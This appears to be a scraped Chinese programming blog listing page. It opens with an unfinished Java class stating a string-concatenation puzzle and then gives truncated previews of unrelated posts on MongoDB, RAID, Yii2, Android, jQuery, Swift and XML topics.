    
public class MaxCatenate {
/*
* Q.37 有n 个长为m+1 的字符串,如果某个字符串的最后m 个字符与某个字符串的前m 个字符匹配,则两个字符串可以联接,
* 问这n 个字符串最多可以连成一个多长的字符串,如果出现循环,则返回错误。
*/
public static void main(String[] args){
    

    • 

  • mongoDB安装
开窍的石头
mongodb安装 基本操作

    mongoDB的安装
  
      1:mongoDB下载   https://www.mongodb.org/downloads  
      2:下载mongoDB下载后解压
    
    

    • 

  • [开源项目]引擎的关键意义
comsci
开源项目

    
     一个系统,最核心的东西就是引擎。。。。。
      而要设计和制造出引擎,最关键的是要坚持。。。。。。
      现在最先进的引擎技术,也是从莱特兄弟那里出现的,但是中间一直没有断过研发的
   
    

    • 

  • 软件度量的一些方法
cuiyadll
方法

    软件度量的一些方法http://cuiyingfeng.blog.51cto.com/43841/6775/在前面我们已介绍了组成软件度量的几个方面。在这里我们将先给出关于这几个方面的一个纲要介绍。在后面我们还会作进一步具体的阐述。当我们不从高层次的概念级来看软件度量及其目标的时候,我们很容易把这些活动看成是不同而且毫不相干的。我们现在希望表明他们是怎样恰如其分地嵌入我们的框架的。也就是我们度量的
    

    • 

  • XSD中的targetNameSpace解释
darrenzhu
xmlnamespacexsdtargetnamespace

    参考链接:
http://blog.csdn.net/colin1014/article/details/357694
xsd文件中定义了一个targetNameSpace后,其内部定义的元素,属性,类型等都属于该targetNameSpace,其自身或外部xsd文件使用这些元素,属性等都必须从定义的targetNameSpace中找:
例如:以下xsd文件,就出现了该错误,即便是在一
    

    • 

  • 什么是RAID0、RAID1、RAID0+1、RAID5,等磁盘阵列模式?
dcj3sjt126com
raid

    RAID 1又称为Mirror或Mirroring,它的宗旨是最大限度的保证用户数据的可用性和可修复性。 RAID 1的操作方式是把用户写入硬盘的数据百分之百地自动复制到另外一个硬盘上。由于对存储的数据进行百分之百的备份,在所有RAID级别中,RAID 1提供最高的数据安全保障。同样,由于数据的百分之百备份,备份数据占了总存储空间的一半,因而,Mirror的磁盘空间利用率低,存储成本高。
Mir
    

    • 

  • yii2 restful web服务快速入门
dcj3sjt126com
PHPyii2

    快速入门
Yii 提供了一整套用来简化实现 RESTful 风格的 Web Service 服务的 API。 特别是,Yii 支持以下关于 RESTful 风格的 API:
支持 Active Record 类的通用API的快速原型
涉及的响应格式(在默认情况下支持 JSON 和 XML)
支持可选输出字段的定制对象序列化
适当的格式的数据采集和验证错误 
    

    • 

  • MongoDB查询(3)——内嵌文档查询(七)
eksliang
MongoDB查询内嵌文档MongoDB查询内嵌数组

    MongoDB查询内嵌文档
转载请出自出处:http://eksliang.iteye.com/blog/2177301 一、概述
       有两种方法可以查询内嵌文档:查询整个文档;针对键值对进行查询。这两种方式是不同的,下面我通过例子进行分别说明。
  二、查询整个文档
例如:有如下文档
db.emp.insert({
&qu
    

    • 

  • android4.4从系统图库无法加载图片的问题
gundumw100
android

    典型的使用场景就是要设置一个头像,头像需要从系统图库或者拍照获得,在android4.4之前,我用的代码没问题,但是今天使用android4.4的时候突然发现不灵了。baidu了一圈,终于解决了。
下面是解决方案:
private String[] items = new String[] { "图库","拍照" };
/* 头像名称 */
    

    • 

  • 网页特效大全 jQuery等
ini
JavaScriptjquerycsshtml5ini

    HTML5和CSS3知识和特效
asp.net ajax jquery实例
分享一个下雪的特效
jQuery倾斜的动画导航菜单
选美大赛示例 你会选谁
jQuery实现HTML5时钟
功能强大的滚动播放插件JQ-Slide
万圣节快乐!!!
向上弹出菜单jQuery插件
htm5视差动画
jquery将列表倒转顺序
推荐一个jQuery分页插件
jquery animate
    

    • 

  • swift objc_setAssociatedObject block(version1.2 xcode6.4)
啸笑天
version

     
import UIKit
class LSObjectWrapper: NSObject {
let value: ((barButton: UIButton?) -> Void)?
init(value: (barButton: UIButton?) -> Void) {
self.value = value

    

    • 

  • Aegis 默认的 Xfire 绑定方式,将 XML 映射为 POJO
MagicMa_007
javaPOJOxmlAegisxfire

          Aegis 是一个默认的 Xfire 绑定方式,它将 XML 映射为 POJO, 支持代码先行的开发.你开发服 务类与 POJO,它为你生成 XML schema/wsdl
XML 和 注解映射概览
      默认情况下,你的 POJO 类被是基于他们的名字与命名空间被序列化。如果
    

    • 

  • js get max value in (json) Array
qiaolevip
每天进步一点点学习永无止境max纵观千象

    // Max value in Array
var arr = [1,2,3,5,3,2];Math.max.apply(null, arr); // 5
// Max value in Jaon Array
var arr = [{"x":"8/11/2009","y":0.026572007},{"x"
    

    • 

  • XMLhttpRequest 请求 XML,JSON ,POJO 数据
Luob.
POJOjsonAjaxxmlXMLhttpREquest

    在使用XMlhttpRequest对象发送请求和响应之前,必须首先使用javaScript对象创建一个XMLHttpRquest对象。
var xmlhttp;
function getXMLHttpRequest(){
if(window.ActiveXObject){
xmlhttp:new ActiveXObject("Microsoft.XMLHTTP
    

    • 

  • jquery
wuai
jquery

    以下防止文档在完全加载之前运行Jquery代码,否则会出现试图隐藏一个不存在的元素、获得未完全加载的图像的大小 等等
$(document).ready(function(){
jquery代码;
});
<script type="text/javascript" src="c:/scripts/jquery-1.4.2.min.js&quo
    

    •